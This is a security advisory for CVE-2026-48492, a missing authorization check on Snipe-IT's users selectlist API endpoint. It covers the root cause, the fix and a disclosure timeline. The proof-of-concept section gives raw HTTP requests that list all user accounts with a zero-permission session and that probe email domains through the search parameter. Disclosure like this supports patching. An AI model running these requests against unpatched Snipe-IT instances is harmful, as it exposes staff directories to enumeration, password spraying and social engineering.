Summary
CVE-2026-48492 affects Snipe-IT versions below 8.5.1. The GET /api/v1/users/selectlist API endpoint is missing the view.selectlists authorization gate that is correctly applied in every other selectlist controller across the codebase. Any user who can log into Snipe-IT — regardless of their permissions — can retrieve a paginated list of all user accounts using only their web session cookie. No API token or elevated privileges are required.
CVSS Score: Low | CVE: CVE-2026-48492 | GHSA-f3c5-6cw8-fg57
What is Snipe-IT?
Snipe-IT is a widely deployed open-source IT asset management platform used by organisations worldwide to track hardware, software licences, accessories and consumables. Its user directory is sensitive data — particularly in organisations that provision accounts for all staff, contractors, or students.
Vulnerability Details
Root Cause
Snipe-IT defines a view.selectlists Gate in app/Providers/AuthServiceProvider.php to restrict selectlist access to users with operational roles.
view.selectlists gate definition in AuthServiceProvider.php
This gate is correctly applied in AssetModelsController, CategoriesController, CompaniesController, DepartmentsController, ManufacturersController, StatuslabelsController, and SuppliersController. However, app/Http/Controllers/Api/UsersController.php::selectlist() has no authorization check at all:
UsersController::selectlist() — missing authorization check
Note: although email is not returned in the JSON response, it is included in the database query and accepted as a search filter, enabling an indirect email oracle.
Proof of Concept
Step 1 — Create a zero-permission user
Zero-permission user created in Snipe-IT admin
Step 2 — Verify the protected endpoint is blocked
The standard user index (GET /api/v1/users/) correctly returns 403 for a zero-permission user:
GET /api/v1/users/ returns 403 for zero-permission user
Step 3 — Call the unprotected selectlist
Using the same session cookie, call the unprotected endpoint:
GET /api/v1/users/selectlist HTTP/1.1
Host: 127.0.0.1:1337
sec-ch-ua-platform: "Linux"
X-CSRF-TOKEN: uR1FxcTGaqsU0caTptkhBRayvKzyrBEl3tIFL58I
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/146.0.0.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Cookie: snipeit_session=<attacker_session>
Connection: keep-aliveResponse: full paginated user list with usernames, display names, employee numbers, and user IDs.
Successful response — user accounts enumerated with zero permissions
Step 4 — Indirect email oracle
Using the search parameter to enumerate by email domain:
GET /api/v1/users/selectlist?search=@iltosec.com HTTP/1.1
Host: 127.0.0.1:1337
X-Requested-With: XMLHttpRequest
Cookie: snipeit_session=<attacker_session>
Email oracle — filtering users by domain via search parameter
Impact
An attacker with only a valid login and zero permissions can:
- Enumerate all active user accounts by paginating through the endpoint
- Harvest usernames for credential stuffing or password spray attacks
- Collect employee numbers and full names for social engineering
- Perform indirect email enumeration via the
searchparameter - Map user IDs for further exploitation — e.g. combined with CVE-2026-48493
Fix
Add the existing view.selectlists gate check to UsersController::selectlist() — a single-line fix that brings it in line with every other selectlist controller:
Fix — $this->authorize("view.selectlists") added to UsersController::selectlist()
Patched in commit 4f943d4, released in v8.5.1.
Disclosure Timeline
| Date | Event |
|---|---|
| 2026-05-19 | Vulnerability discovered |
| 2026-05-21 | Report submitted to Snipe-IT (HackerOne #55580) |
| 2026-05-21 | Vendor confirmed |
| 2026-05-22 | Correction submitted — authorize('view.selectlists') |
| 2026-05-22 | Patch committed (4f943d4) |
| 2026-05-28 | CVE-2026-48492 assigned, advisory published |
| 2026-05-28 | v8.5.1 released |